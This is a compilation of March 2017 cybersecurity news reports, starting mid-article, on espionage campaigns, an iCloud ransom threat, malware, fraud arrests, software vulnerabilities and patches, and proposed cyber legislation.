The attackers continued their activity by moving to a new command and control (C&C) infrastructure and applying minor changes to their malicious code mostly to evade detection.

“El Machete has continued largely unimpeded in their espionage activities for the past several years, despite the abundance of publicly available indicators.” continues Cylance researchers.”Many of these indicators should have allowed defenders to reliably identify this threat, but the majority of antivirus (AV) solutions continue to have very low detection rates across current samples,”

The analysis published by Cylance includes several useful information, including IoCs, enjoy it.


Turkish Crime Family group will remotely wipe hundreds of millions of iPhones unless Apple pays ransom
23.3.2017 securityaffairs Apple 

Hackers belonging to the Turkish Crime Family group threaten to remotely wipe hundreds of millions of iPhones unless Apple pays a ransom.
Crooks are claiming to have over 627 millions of iCloud credentials and intend to wipe date from iPhones, iPads and Macs if the Apple does not pay $150,000 within two weeks.
Members of the group which calls itself Turkish Crime Family claim that they’ve been involved in selling databases of stolen credentials for the past few years.
“The group said via email that it has had a database of about 519 million iCloud credentials for some time, but did not attempt to sell it until now. The interest for such accounts on the black market has been low due to security measures Apple has put in place in recent years, it said.” reported ComputerWorld.

The members of the group are originally from Istanbul, but now seem to be located in Green Lanes, an area in North London.

Turkish Crime Family

The situation is not so critical, changing the iCloud passwords will make ineffective the operation of the crooks. As usual, let me suggest also to enable two-factor authentication.

The hackers claim to have verified over 220 million of the credentials, they login credentials allowed them to access to iCloud accounts.
The hackers tested the login credentials using automated scripts and a large number of proxy servers to avoid being blocked by Apple.
Initially, the Turkish Crime Family crew asked Apple a $75,000 ransom in Bitcoin or Ethereum cryptocurrency. Now the group has increased its request raising the ransom value to $150,000, and the group intends to increase it further if Apple doesn’t pay in three days.

According to Motherboard, Apple will not pay the ransom, the hackers provided screenshots of alleged emails between its members and the Apple’s security team. Someone also published a video on YouTube showing how to use leaked credentials to access iCloud accounts, but the group claims that the person who shared the video is not a member of their group.
“We firstly kindly request you to remove the video that you have uploaded on your YouTube channel as it’s seeking unwanted attention, second of all we would like you to know that we do not reward cyber criminals for breaking the law,” reads a message allegedly sent by a member of Apple’s security team reads. (Motherboard only saw a screenshot of this message and not the original). The alleged Apple team member then says archived communications with the hacker will be sent to the authorities.”

Apple did not immediately respond to a request for comment.

“We are doing this because we can and mainly to spread awareness for Karim Baratov and Kerem Albayrak, which both are being detained for the Yahoo hack and one of them is most probably facing heavy sentencing in America,” a representative for the group said via email. “Kerem Albayrak on the other hand is being accused of listing the database for sale online.”

At this point we have to wait April 7, this is the date when the hackers plan to launch the mass attack on iCloud accounts and wipe their contents.


Code Execution Vulnerability Found in LabVIEW

23.3.2017 securityweek Vulnerebility
Researchers at Cisco Talos have reported finding a high severity code execution vulnerability in the LabVIEW system design software from National Instruments.

According to Talos, LabVIEW 2016 version 16.0 is affected by a heap-based buffer overflow vulnerability which can be triggered with a specially crafted VI file (a LabVIEW specific format) that causes a user-controlled value to be used as a loop terminator.

By getting a targeted user to open a malicious VI file, a remote attacker can execute arbitrary code. Cisco has published an advisory containing technical details about the flaw, which is tracked as CVE-2017-2775.

The security hole was reported to National Instruments on January 13 and it was disclosed on March 22, but it’s unclear if a patch is available. An update released recently by the vendor does address a memory corruption issue that fits the description.

SecurityWeek has reached out to both Cisco and National Instruments for clarifications and will update this article if they respond.

LabVIEW is often used for data acquisition, instrument control and industrial automation, and this vulnerability could allow a threat actor to compromise a device responsible for controlling a physical system.

Learn More at the 2017 Singapore ICS Cyber Security Conference

“Organizations using this and similar software to control physical systems need to bear in mind the possibility of attackers exploiting vulnerabilities in control software to gain access to physical systems,” Talos said in a blog post.

“Equally, organizations should remember that proprietary file formats do not protect against software vulnerabilities. Even in the absence of a published file format specification vulnerabilities triggered by malicious files may still be discovered,” it added.


Winnti Group Uses GitHub for C&C Communications

23.3.2017 securityweek Virus
The China-linked threat group known as Winnti has been abusing GitHub for command and control (C&C) communications, Trend Micro reported on Wednesday.

Winnti, mainly known for financially-motivated espionage campaigns aimed at the online gaming industry, has been around since at least 2007. A majority of the threat actor’s victims are located in Southeast Asia.

Trend Micro has been monitoring the group and discovered that its malware connected to a GitHub account in order to obtain the exact location of C&C servers.

Winnti has continued to use PlugX, a RAT that is often leveraged by Chinese threat actors, but experts also discovered what appears to be a new backdoor (BKDR64_WINNTI.ONM).

The malware checks an HTML page stored in a GitHub project. The file contains an encrypted string that hides the IP address and port number for the C&C server. The information was encrypted via an algorithm known to be used by PlugX and other algorithms derived from it.

According to Trend Micro, the GitHub project used by Winnti was created in May 2016 and it was first used for C&C communications in August 2016. Experts believe the GitHub account was likely created by the attackers themselves and not hijacked from its original owner.

Between August 17 and March 12, Trend Micro noticed nearly two dozen C&C server IP and port combinations. Researchers said a majority of the servers were located in the United States, and two in Japan.

One user pointed out on Reddit that the C&C servers appear to be hosted by Krypt Technologies, whose services have often been abused for botnets and other threats.

As for the new Winnti backdoor, the malware uses a loader that leverages a modified version of a Microsoft registry tool (loadperf.dll) and the WMI performance adapter service in Windows (wmiAPSrv). The loader imports and decrypts the main payload and loads it into memory.

“Abusing popular platforms like GitHub enables threat actors like Winnti to maintain network persistence between compromised computers and their servers, while staying under the radar,” explained Trend Micro threat researcher Cedric Pernet. “Although Winnti may still be employing traditional malware, its use of a relatively unique tactic to stay ahead of the threat landscape’s curve reflects the increased sophistication that threat actors are projected to employ.”


Lithuanian Man Arrested Over $100 Million Email Scam

23.3.2017 securityweek Spam
A Lithuanian man has been indicted in the United States for convincing two U.S.-based Internet companies into wiring over $100 million to bank accounts he controlled as part of an email fraud scheme.

Evaldas Rimasauskas, 48, was arrested late last week in Lithuania on the basis of a provisional arrest warrant, the New York Office of the FBI said.

The indictment (PDF) claims that Rimasauskas has orchestrated a fraudulent scheme in or around 2013 through in or about 2015, to deceive targeted companies, including a multinational technology company and a multinational online social media company, into wiring funds to bank accounts he controlled.

Rimasauskas registered a company in Latvia with the same name as an Asian-based computer hardware manufacturer, and also opened, maintained, and controlled accounts at banks in Latvia and Cyprus in the name of this company. Then, he started sending fraudulent phishing emails to victim companies – which regularly conducted multimillion-dollar transactions with the legitimate manufacturer – to direct money these companies owed for legitimate goods and services to the accounts he controlled.

As soon as the victim companies wired money to his accounts, Rimasauskas quickly transferred the funds to different bank accounts in various locations throughout the world, including Latvia, Cyprus, Slovakia, Lithuania, Hungary, and Hong Kong.

Further, the individual “caused forged invoices, contracts, and letters that falsely appeared to have been executed and signed by executives and agents of the Victim Companies, and which bore false corporate stamps embossed with the Victim Companies’ names, to be submitted to banks in support of the large volume of funds that were fraudulently transmitted via wire transfer,” U.S. Attorney’s Office, Southern District of New York, says.

Over the course of the scheme, these false and deceptive representations resulted in Rimasauskas causing victim companies to transfer a total of over $100,000,000 in U.S. currency to the accounts he controlled.

Rimasauskas is charged with one count of wire fraud, three counts of money laundering (each carries a maximum sentence of 20 years in prison), and one count of aggravated identity theft. The maximum potential sentences will be determined by the judge.

“From half a world away, Evaldas Rimasauskas allegedly targeted multinational internet companies and tricked their agents and employees into wiring over $100 million to overseas bank accounts under his control. This case should serve as a wake-up call to all companies – even the most sophisticated – that they too can be victims of phishing attacks by cyber criminals. And this arrest should serve as a warning to all cyber criminals that we will work to track them down, wherever they are, to hold them accountable,” acting U.S. Attorney Joon H. Kim said.


'Machete' Continues to Spy on Spanish-Speaking Countries

23.3.2017 securityweek Cyber
The threat group behind the cyber espionage campaign dubbed “Machete” continues to target entities in Spanish-speaking countries, endpoint security firm Cylance reported on Wednesday.

Machete was first analyzed by Kaspersky Lab back in 2014. At the time, the company said the operation had been active since 2010, with some improvements made in 2012.

The list of targeted entities included intelligence services, embassies, government institutions and military organizations. A majority of the victims at the time were located in Venezuela, Ecuador and Colombia, but some compromised systems were also identified in Russia (embassies), Peru, Cuba, Brazil, the U.S., Spain, Sweden, and China.

The attackers had used spear-phishing emails and fake blogs to deliver malware capable of logging keystrokes, capturing audio from the microphone, taking screenshots and photos via the webcam, collecting geolocation data, and exfiltrating files to a remote server or a special USB device.

Cylance researchers have also analyzed the campaign and identified over 300 unique victims in the past month. According to the security firm, the attackers managed to steal more than 100 Gb of data from organizations.

A majority of the victims identified by Cylance were located in Ecuador, Venezuela, Peru, Argentina and Colombia, but some targets were also found in Korea, the U.S., the Dominican Republic, Bolivia, Cuba, Guatemala, Nicaragua, Mexico, the U.K., Canada, Germany, Russia and Ukraine.

The types of organizations targeted are mostly the same as reported by Kaspersky, but Cylance also mentioned telecommunications and power companies.

Kaspersky noted in its 2014 report that the attacker appeared to be a native Spanish speaker. Cylance pointed out that it did not see any victims in Brazil, and that the most heavily targeted countries shared a land border with Brazil. This could suggest that the attacks have been launched from Brazil, but it contradicts Kaspersky’s initial finding as Brazilians speak Portuguese.

According to Cylance, the threat actor behind Machete managed to keep its operations alive by moving to a new command and control (C&C) infrastructure and making minor changes to its malware to evade signature-based detection.

“El Machete has continued largely unimpeded in their espionage activities for the past several years, despite the abundance of publicly available indicators. Many of these indicators should have allowed defenders to reliably identify this threat, but the majority of antivirus (AV) solutions continue to have very low detection rates across current samples,” said Cylance researchers.

As for Machete victims, experts pointed out that many of the targeted countries are known customers of companies such as FinFisher and Hacking Team, which suggests that they have yet to develop their own cyber capabilities.


Rogue Cellphone towers used to spread the Android Swearing Trojan
23.3.2017 securityaffairs Android

Chinese scammers are deploying rogue cellphone towers to spread the Android Swearing Trojan via malicious URL in SMS messages.
Chinese scammers are deploying fake mobile base stations to spread the Android Swearing Trojan in text messages.

The attackers have improved the well-known Smishing attack using rogue cell phone towers as the attack vector and distribute the Android banking malware via spoofed SMS messages.

The rogue Cellphone towers send SMS messages include a malicious URL purport to be from China Telecom or China Unicom. According to the experts from Check Point, China’s Tencent has also observed a more conventional malware dropper in infected applications.

With this technique, the scammers avoid being caught by the control implemented by carriers.

The Swearing Trojan is quite similar to other banking trojan, it is able to steal user data and it can bypass 2-factory authentication (2FA) security.

It is able to intercept the one-time code sent to the user via SMS during the authentication phase. By replacing the original Android SMS app with an altered version of its own, Swearing Trojan can intercept incoming SMS messages, rendering two-factor authentication useless.

“By replacing the original Android SMS app with an altered version of its own, Swearing Trojan can intercept incoming SMS messages, rendering two-factor authentication useless.” reads the analysis published by CheckPoint

Since Google Play Store is blocked in China, it is easy for scammers trick users into installing the APK from an untrusted source just by sending an SMS.

Rogue Cellphone Towers android malware

“Using a BTS to send fake messages is quite sophisticated, and the SMS content is very deceptive. The message tricks users into clicking a malicious URL which installs malware,” continues CheckPoint Security.

There are more phishing scams Swearing Trojan uses to spread:

Work related documents: A fake SMS message coming from a manager asks the user to download and open an important document right away, and to reply to comments inside.
Photos or videos: A fake SMS message claims to include a picture of a memorable event, or to be of a cheating spouse.
Trending events: A recent example posed as a MMS message including a video of a cheating celebrity wife caught in action.
App update notifications: An SMS message claims to be from a bank or telecom provider, and asks the user to install critical updates.
This version of the Swearing Trojan doesn’t use command and control servers, the malicious code sends information back to the crooks via SMS or email.

Tencent reported the arrest of the cyber criminal gang associated with the Swearing Trojan, the new wave of attacks leveraging on the malware demonstrates that another gang is using the code.


Proposed Legislation Would Give Legal Right to Hack Back

22.3.2017 Securityweek Hacking
Hacking back is a perennial and contentious issue. Its latest instance comes in the form of a 'Discussion Draft' bill proposed by Representative Tom Graves (R-GA): The Active Cyber Defense Certainty Act. Graves claims it is gaining bipartisan support, and he expects to present it to the House of Representatives for vote within the next few months.

The Draft Bill (PDF) is an amendment to the Computer Fraud and Abuse Act (CFAA). The CFAA is a deterrent to hacking through potentially severe sanctions; but it has not been effective in preventing cybercrime, and it has made hacking back illegal. The new bill would remove those parts of the CFAA that effectively prevent private business from taking their own action against hackers: "It is a defense to a prosecution under this section that the conduct constituting the offense was an active cyber defense measure."

Noticeably, the bill uses the term 'active cyber defense' throughout, and never once mentions the term 'hacking back'. Active cyber defense is defined by SANS as "The process of analysts monitoring for, responding to, and learning from adversaries internal to the network." It is discussed in detail and expanded in the study titled Into the Grey Zone: The Private Sector and Active Defense against Cyber Threats published by the George Washington University in October 2016.

The George Washington University report warns, "Today, when active defense is discussed, too often the discussion shifts to 'hacking back' -- offensive cyber measures that are beyond the scope of what we define as permissible activity in this report." This has clearly happened with the Graves proposal: it conflates active defense with hacking back.

The proposed Act will provide a CFAA defense when a 'victim' organization responds in a manner "consisting of accessing without authorization the computer of the attacker to the victim's own network to gather information in order to establish attribution of criminal activity to share with law enforcement or to disrupt continued unauthorized activity against the victim's own network."

This is limited by a requirement not to destroy information, not to cause physical injury, and not to create a threat to public health or safety. Nevertheless, it fundamentally gives victim organizations the right to access the attackers' computer without authorization... to disrupt the hackers' action -- and this is hacking back.

Hacking back already happens under limited circumstances. Law enforcement does it, and often uses the expertise of security firms to help.

"To a limited extent," comments security researcher David Harley, "this Act would formalize a cooperative framework that already exists between security companies and law enforcement agencies." This relationship gives law enforcement security expertise and capacity, while offering some legal protection to the security firms.

But, he adds, "I would have to worry about a framework that extended this protection to companies that don't often have that expertise and may be motivated to misuse that protection for competitive advantage... Apart from the ethical issues, I suspect that the quality of those investigations might in many cases be severely compromised."

So, two immediate problems with allowing hacking back is that a lack of expertise could either compromise forensic evidence, or accidentally cause actual harm to the attackers' supposed computers. Without adequate expertise, the supposed servers might not even be the attackers' servers. "Because of (compromised) proxies," comments F-Secure's security advisor Sean Sullivan, "hacking back/active defense is complicated and it's quite unlikely that the US Congress would be able to properly define what should be allowed or not."

The Graves proposal makes some attempt at this. It defines the attacker as "a person or an entity that is the source of the persistent unauthorized intrusion into the victim's computer." The use of 'intrusion' would seem to exclude private companies from seeking to takedown botnets delivering a DDoS attack, where actual intrusion is rare. But it is not at all clear what 'persistent' would mean in a court of law.

The FBI's official position, for now at least, is that it should not be done. FBI Director James Comey said on March 8 this year, "Don't do it; it's a crime. It's not only against the law but it runs the risk of tremendous confusion in a crowded space." Comey's preference would be for more consistent reporting of cybercrime to the FBI.

The reality, however, is the right to hack back is a concept that will not go away.

Luis Corrons, technical director at PandaLabs, fears that the whole issue is too complex and context-sensitive for law; and would prefer greater use of common sense. "Having laws that consider each particular case is unviable, and common sense should be applied. Cybercriminals are not going to present charges if you break into their server and make a copy of the key to unencrypt your data. And no Law Enforcement agency should go after you for that if nobody is reporting it. However, that data might be in a compromised server, and the way to get into it could cause problems within it, causing the owner of that server to contact law enforcement for the disruption caused."

In a sense, Corrons' solution is that the authorities should simply turn a blind eye to hacking back that causes zero collateral damage; and that private industry needs to take responsibility for any collateral damage it causes.


'Machete' Continues to Spy on Spanish-Speaking Countries

22.3.2017 Securityweek CyberSpy
The threat group behind the cyber espionage campaign dubbed “Machete” continues to target entities in Spanish-speaking countries, endpoint security firm Cylance reported on Wednesday.

Machete was first analyzed by Kaspersky Lab back in 2014. At the time, the company said the operation had been active since 2010, with some improvements made in 2012.

The list of targeted entities included intelligence services, embassies, government institutions and military organizations. A majority of the victims at the time were located in Venezuela, Ecuador and Colombia, but some compromised systems were also identified in Russia (embassies), Peru, Cuba, Brazil, the U.S., Spain, Sweden, and China.

The attackers had used spear-phishing emails and fake blogs to deliver malware capable of logging keystrokes, capturing audio from the microphone, taking screenshots and photos via the webcam, collecting geolocation data, and exfiltrating files to a remote server or a special USB device.

Cylance researchers have also analyzed the campaign and identified over 300 unique victims in the past month. According to the security firm, the attackers managed to steal more than 100 Gb of data from organizations.

A majority of the victims identified by Cylance were located in Ecuador, Venezuela, Peru, Argentina and Colombia, but some targets were also found in Korea, the U.S., the Dominican Republic, Bolivia, Cuba, Guatemala, Nicaragua, Mexico, the U.K., Canada, Germany, Russia and Ukraine.

The types of organizations targeted are mostly the same as reported by Kaspersky, but Cylance also mentioned telecommunications and power companies.

Kaspersky noted in its 2014 report that the attacker appeared to be a native Spanish speaker. Cylance pointed out that it did not see any victims in Brazil, and that the most heavily targeted countries shared a land border with Brazil. This could suggest that the attacks have been launched from Brazil, but it contradicts Kaspersky’s initial finding as Brazilians speak Portuguese.

According to Cylance, the threat actor behind Machete managed to keep its operations alive by moving to a new command and control (C&C) infrastructure and making minor changes to its malware to evade signature-based detection.

“El Machete has continued largely unimpeded in their espionage activities for the past several years, despite the abundance of publicly available indicators. Many of these indicators should have allowed defenders to reliably identify this threat, but the majority of antivirus (AV) solutions continue to have very low detection rates across current samples,” said Cylance researchers.

As for Machete victims, experts pointed out that many of the targeted countries are known customers of companies such as FinFisher and Hacking Team, which suggests that they have yet to develop their own cyber capabilities.


Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan
22.3.2017 thehackernews Android

Chinese Hackers have taken Smishing attack to the next level, using rogue cell phone towers to distribute Android banking malware via spoofed SMS messages.
SMiShing — phishing attacks sent via SMS — is a type of attack wherein fraudsters use number spoofing attack to send conceiving bogus messages to trick mobile users into downloading a malware app onto their smartphones or lures victims into giving up sensitive information.
Security researchers at Check Point Software Technologies have uncovered that Chinese hackers are using fake base transceiver stations (BTS towers) to distribute "Swearing Trojan," an Android banking malware that once appeared neutralized after its authors were arrested in a police raid.
This is the first ever reported real-world case in which criminals played smart in such a way that they used BTS — a piece of equipment usually installed on cellular telephone towers — to spread malware.
The phishing SMS, which masquerades itself as the one coming from Chinese telecom service providers China Mobile and China Unicom, contains very convincing text with a link to download malicious Android APK.
Since Google Play Store is blocked in China, the SMS easily tricks users into installing the APK from an untrusted source.
"Using a BTS to send fake messages is quite sophisticated, and the SMS content is very deceptive. The message tricks users into clicking a malicious URL which installs malware," the researchers said in the blog post.
Once installed, the Swearing malware distributes itself by sending automated phishing SMSes to a victim's contacts.
However the maximum range of a BTS antenna may be as low as 10-22 miles, the technique is very successful and sophisticated in targeted attacks.
Discovered last year by Tencent Security researchers, the Swearing Trojan has the capability to steal bank credentials and other sensitive information from victim Android devices and to bypass two-factor authentication by replacing a user's legit SMS app with a malicious version that intercepts incoming SMS messages.
What's more interesting? To avoid detection of any malicious activity, the Swearing trojan doesn't connect to any remote command-and-control (C&C) server. Instead, it uses SMS or emails to send stolen data back to the hackers.
"This provides the malware with good cover for its communications and hinders attempts to trace any malicious activity."
While this particular malware campaign has usually targeted Chinese users, Check Point researchers warned in a blog post that the threat could quickly spread worldwide when adopted by Western malware.
The malware scheme seems to be larger than previously thought, as according to researchers, only 21cn.com email addresses were used in the initial malware campaign, while new attacks used other popular Chinese email service providers, such as 163.com, sina.cn, and qq.com, and Alibaba Cloud and other cloud service hosted email accounts as well.
Check Point also points out the nasty HummingBad malware trojan that was also discovered in the Chinese mobile market, and "turned out to be early birds which continued to spread worldwide" if adopted by western malware.


Hackers Threaten to Remotely Wipe 300 Million iPhones Unless Apple Pays Ransom
22.3.2017 thehackernews Apple

If you use iCloud to sync your Apple devices, your private data may be at risk of getting exposed or deleted by April 7th.
It has been found that a mischievous group of hackers claiming to have access to over 300 million iCloud accounts is threatening Apple to remotely wipe data from those millions of Apple devices unless Apple pays it $75,000 in crypto-currency or $100,000 worth of iTunes gift cards.
The hacking group, who identified themselves as 'Turkish Crime Family,' has demanded a ransom to be paid in Bitcoin or Ethereum, another popular crypto-currency.
Motherboard broke this story on Tuesday after a hacker claiming to represent the alleged hacking group shared screenshots of alleged emails between the group and Apple's security team with the publication.
"I just want my money and thought this would be an interesting report that a lot of Apple customers would be interested in reading and hearing," the hacker told Motherboard.
The screenshots of email exchange indicate that when Apple security team asked for a sample list of hacked account to verify the claims, the group only provided a YouTube video demonstrating access to one of the allegedly hacked accounts and remotely wiping all content from the device.
However, the story seems inconsistent, as on its Twitter account, the group claims to have access to 200 million iCloud accounts, while in one of the emails, it says to access 300 million Apple email accounts and in another, the number gets almost double to 559 million.
At this time, it is very difficult for even Apple to verify the claims. However, the company has warned the group saying that it does not reward cyber criminals for breaking the law and asking them to remove the video as it was "seeking unwanted attention."
The hacking group has given Apple a deadline until April 7 to pay up the ransom. Unless its demands are met, the group are going to start remotely wiping victim's Apple devices and reset iCloud accounts.
How to Protect Your iCloud Account From Hackers
Whether the claims and threat are real or not, but if hackers gain access to your iCloud account, they could easily download all your photos and other private data.
In order to keep your iCloud account safe from hackers, Apple users are advised to change their iCloud passwords immediately and enable two-step authentication to add an extra layer of security to your account.
Also Read: Searching for Leaked Celebrity Photos? Don't Blindly Click Any Fappening Link!
We have already aware of the consequences iCloud accounts can make if they get hacked by malicious attackers. In 2014, iCloud hack led to The Fappening, wherein hackers flooded the Internet with nude photos of hundreds of female celebrities, which were stored in their iCloud accounts.
Some people are also linking the Turkish Crime Family to the recent The Fappening 2.0 incident that leaked private photographs of many celebrities, including Emma Watson and Mc Rose, last week.
However, there is no evidence to suggest the blackmail attempt had anything to do with The Fappening 2.0 attack.


Citadel Botnet Author Pleads Guilty

22.3.2017 securityweek BotNet
A Russian national has pleaded guilty in a United States court to charges related to the development and distribution of the Citadel malware.

Mark Vartanyan, who has been going by the hacker name of “Kolypto,” was arrested in Norway and extradited to the United States in Dec. 2016. For his role in the development and maintenance of the Citadel malware, he is charged with one count of computer fraud.

Citadel is a well-known information-stealing malware designed with keylogging capabilities as means to steal account credentials for online banking. The malware also recruited infected machines into botnets that were estimated in June 2013 to have been responsible for over half a billion dollars in financial fraud, affecting more than five million people in 90 countries.

The threat emerged soon after the source code for the Zeus malware emerged online. New variants of the malware were observed starting with late 2014, the most recent of them being Atmos, which was described about a year ago as Citadel's polymorphic successor. This variant had more than 1,000 bots in April last year.

Starting in 2011, Citadel was offered for sale on invite-only, Russian underground forums, and was used to target and exploit the networks of major financial and government institutions, U. S. Attorney John Horn said in a statement. The malware is estimated to have infected around 11 million computers worldwide.

Vartanyan is accused of being actively engaged in the “development, improvement, maintenance and distribution of Citadel” between August 21, 2012 and January 9, 2013, while living in Ukraine, and between April 9, 2014 and June 2, 2014, while living in Norway.

“During these periods, Vartanyan allegedly uploaded numerous electronic files that consisted of Citadel malware, components, updates and patches, as well as customer information, all with the intent of improving Citadel’s illicit functionality,” a last week announcement from the Department of Justice reads.

Vartanyan was charged in a one-count Information with computer fraud, and he is pleading guilty, the plea agreement filed this week by the U.S. Attorney’s Office, Northern District of Georgia, reads (PDF). The hacker faces up to 10 years in prison and a maximum fine of $250,000.

“This defendant’s alleged role in developing and improving “Citadel” for its use by cybercriminals caused a vast amount of financial harm to individuals and institutions around the world. His appearance in federal court today shows that cybercriminals cannot hide in the shadows of the Internet. We will identify them and bring them to justice wherever they operate,” U.S. Attorney Horn said.


Senators Reintroduce Bills to Improve Cybersecurity of Vehicles and Airplanes

22.3.2017 securityweek Cyber
Legislation Would Protect Drivers From Auto Security and Privacy Risks, Implement Cybersecurity Standards for Aircraft

Senators Edward J. Markey (D-Mass.) and Richard Blumenthal (D-Conn.), members of the Commerce, Science and Transportation Committee, reintroduced two pieces of legislation that would implement and improve cybersecurity standards for cars and aircraft.

The Security and Privacy in Your Car (SPY Car) Act directs the National Highway Traffic Safety Administration and the Federal Trade Commission to establish federal standards to secure our cars and protect drivers’ privacy, as well as establishes a rating system – or “cyber dashboard” – that informs consumers about how well the vehicle protects drivers’ security and privacy beyond those minimum standards. In 2014, Senator Markey released the report “Tracking & Hacking: Security & Privacy Gaps Put American Drivers at Risk,” which detailed major gaps in how auto companies are securing connected features in cars against hackers.

The second piece of legislation, the Cybersecurity Standards for Aircraft to Improve Resilience (Cyber AIR) Act, requires the disclosure of information relating to cyberattacks on aircraft systems and establish standards to identify and address cybersecurity vulnerabilities to the United States commercial aviation system. The bill also seeks a report to study cybersecurity vulnerability of consumer wi-fi on planes. In 2015, Senator Markey began an investigation about airline and aircraft manufacturer protections and protocols against the threat of cyberattacks in relation to the integration of new technologies onboard modern aircraft. Last year, Senators Markey and Blumenthal called on the Federal Aviation Administration (FAA) to adopt robust regulations to ensure that aircraft and ground support equipment are not vulnerable to cyberattacks.

“Whether in their cars on the road or in aircraft in the sky, Americans should be protected from cyberattack and violations of their privacy,” said Senator Markey. “If hackers access the critical systems of a car or plane, disaster could ensue and our public safety could be compromised. We must ensure that as technologies change, our safety and privacy is maintained. I thank Senator Blumenthal for his partnership on this critical issue.”

“This critical legislation will help protect the public against cybercriminals who exploit advances in technology like wireless-connected aircraft and self-driving cars,” said Senator Blumenthal. “As technology rapidly advances, we must ensure the auto and airline industries protect their systems from cybersecurity attacks. Security and safety cannot be sacrificed as we achieve the convenience and promise of wireless progress.”


Brain-Inspired System Aims to Improve Threat Detection

22.3.2017 securityweek Security
Cyber Microscope

A new "brain-inspired" computer system promises improved detection of cyber threats by looking for specific patterns that can more efficiently reveal indicators of compromise in a network.

Dubbed the Neuromorphic Cyber Microscope, the system was designed by Lewis Rhodes Labs in partnership with Sandia National Laboratories and aims to address the limitation current systems have when it comes to the detection of more complex indicators of compromise, which the researchers call “new species of ‘bad apples’.”

The designers of the system explain that many modern cybersecurity systems might be looking for general indicators of compromise or only for specific patterns, and often require interaction from security analysts to correctly sort the real dangers from false alarms.

By using its brain-inspired design, the new system promises not only to address this limitation by looking for complex patterns that indicate specific “bad apples,” but also to offer energy consumption savings, as it requires “less electricity than a standard 60-watt light bulb,” its creators claim.

The Microscope’s processor is based on the neuroscience research of Dr. Pamela Follett, a co-founder of Lewis Rhodes Labs. The research was used by her husband, David Follett, co-founder and CEO of Lewis Rhodes Labs, as the basis for a computational model of how the brain processes information.

A team led by computer systems expert John Naegle considered cybersecurity as the domain where the neuromorphic processor would excel.

“We quickly realized that we could use this architecture to greatly accelerate our ability to look for patterns and even look for complex versions of these patterns,” Naegle said.

While conventional detection systems compare the received data against a library of malicious patterns, the Neuromorphic Cyber Microscope was designed to compare streaming data to suspicious patterns in a time-dependent manner, which should improve its detection efficiency.

According to Sandia, it tested the system in a demonstration environment and discovered that it could perform efficiently even when the “bad apple” patterns got more complex, in comparison with a state-of-the-art conventional system that slowed exponentially. Further, the laboratory claims that the Microscope is “more than 100 times faster and 1,000 times more energy-efficient than racks of conventional cybersecurity systems.”

At the moment, however, the Neuromorphic Cyber Microscope is only in the early stages of deployment.

Sandia and Lewis Rhodes Labs are also exploring alternative uses for the general neuromorphic architecture, including a type of machine learning used for audio and image processing and sorting numbers efficiently.


High Severity Flaws Patched in Rockwell Automation Tools

22.3.2017 securityweek Vulnerebility
High severity vulnerabilities have been patched by Rockwell Automation in the company’s Connected Components Workbench and FactoryTalk Activation tools, ICS-CERT said on Wednesday.

One of the flaws, discovered by researcher Ivan Sanchez and tracked as CVE-2017-5176, affects Connected Components Workbench (CCW), a design and configuration application for Rockwell devices. The product is used worldwide in various industries.

According to ICS-CERT, CCW is affected by a DLL hijacking vulnerability that allows a skilled attacker with access to the targeted system to inject malicious code into processes or cause a denial-of-service (DoS) condition.

The flaw affects CCW Developer and Free Standard editions, versions 9.01.00 and earlier. A patch is included in versions 10.00 and 10.01.

Learn More at the 2017 Singapore ICS Cyber Security Conference

The second high severity vulnerability was identified by Rockwell Automation in FactoryTalk Activation, a tool used for activating and managing Rockwell software and activation files. The tool is used by several products, including FactoryTalk, Arena, Emonitor, RSFieldBus, RSLinx, RSLogix, RSNetWorx, RSView32, SoftLogix and Studio 5000.

The security hole, CVE-2017-6015, is related to the improper handling of search paths and it can be exploited by a local user with limited rights to execute arbitrary code with elevated privileges.

The vulnerability affects FactoryTalk Activation 4.00.02 and prior, and it has been addressed with the release of version 4.01.

Rockwell customers that cannot immediately update their software have been provided mitigation instructions for both the CCW and FactoryTalk Activation flaws.


Vulnerabilities in LastPass allowed attackers to steal passwords
22.3.2017 securityaffairs Vulnerebility

The notorious Google Project Zero hacker Tavis Ormandy discovered numerous vulnerabilities in the Chrome and Firefox extensions of the LastPass password manager.
The Security expert at Google Project Zero Tavis Ormandy discovered several vulnerabilities in Chrome and Firefox extensions of the LastPass password manager that can be exploited to steal passwords.

The expert also wrote PoC exploit for the flaw and highlighted that only one of them appears to have been patched by LastPass.

Ormandy first discovered a flaw in the Firefox version of the LastPass extension (version 3.3.2), he avoided to publicly disclose the details for obvious reasons. According to the Google disclosure policy, LastPass has 90 days to solve the issue before Project Zero experts will disclose the details.


Follow
Tavis Ormandy @taviso
Wrote a quick exploit for another LastPass vulnerability. Only affects version on http://addons.mozilla.org (3.3.2), report on way. ¯\_(ツ)_/¯
3:45 AM - 16 Mar 2017
546 546 Retweets 681 681 likes
LastPass confirmed that the security team is already working to fix the bug.

Follow
LastPass ✔ @LastPass
We are aware of reports of a Firefox add-on vulnerability. Our security is investigating and working on issuing a fix.
1:17 AM - 22 Mar 2017
61 61 Retweets 93 93 likes
Yesterday, Ormandy reported another flaw that affected both the Chrome and Firefox versions of LastPass. The researcher explained that the vulnerability allowed attackers to steal a user’s passwords and, if the binary component was enabled, execute arbitrary code via remote procedure call (RPC) commands.

In order to exploit the flaw, the attacker has to trick victims into visiting a specially crafted web page.

In this case, LastPass promptly issued a temporary fix and immediately after announced it has fully patched the vulnerability on the server side.

Follow
LastPass ✔ @LastPass
The issue reported by Tavis Ormandy has been resolved. We will provide additional details on our blog soon.
2:17 PM - 21 Mar 2017
70 70 Retweets 108 108 likes
Ormandy publicly disclosed the details of the flaw including a proof-of-concept (PoC) code. The flaw existed due to the websiteConnector.js content script proxying unauthenticated messages to the extension. An attacker can exploit it to gain access to internal LastPass RPC commands.

“Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things copying and filling in passwords (copypass, fillform, etc).” wrote the expert. “If you install the binary component (https://lastpass.com/support.php?cmd=showfaq&id=5576), you can also use “openattach” to run arbitrary code.”

Ormandy also spotted another vulnerability that can be exploited to steal passwords for any domain.

Follow
Tavis Ormandy @taviso
I found another bug in LastPass 4.1.35 (unpatched), allows stealing passwords for any domain. Full report will be on the way shortly.


New Metasploit RFTransceiver extension allows testing IoT sevices
22.3.2017 securityaffairs Exploit

Metasploit RFTransceiver extension implements the Hardware Bridge API that will allow organizations to test wireless devices operating outside 802.11 spec.
Recently we reported the news of the availability of a new hardware bridge for Metasploit extension to test hardware, including IoT devices.

Metasploit RFTransceiver extension

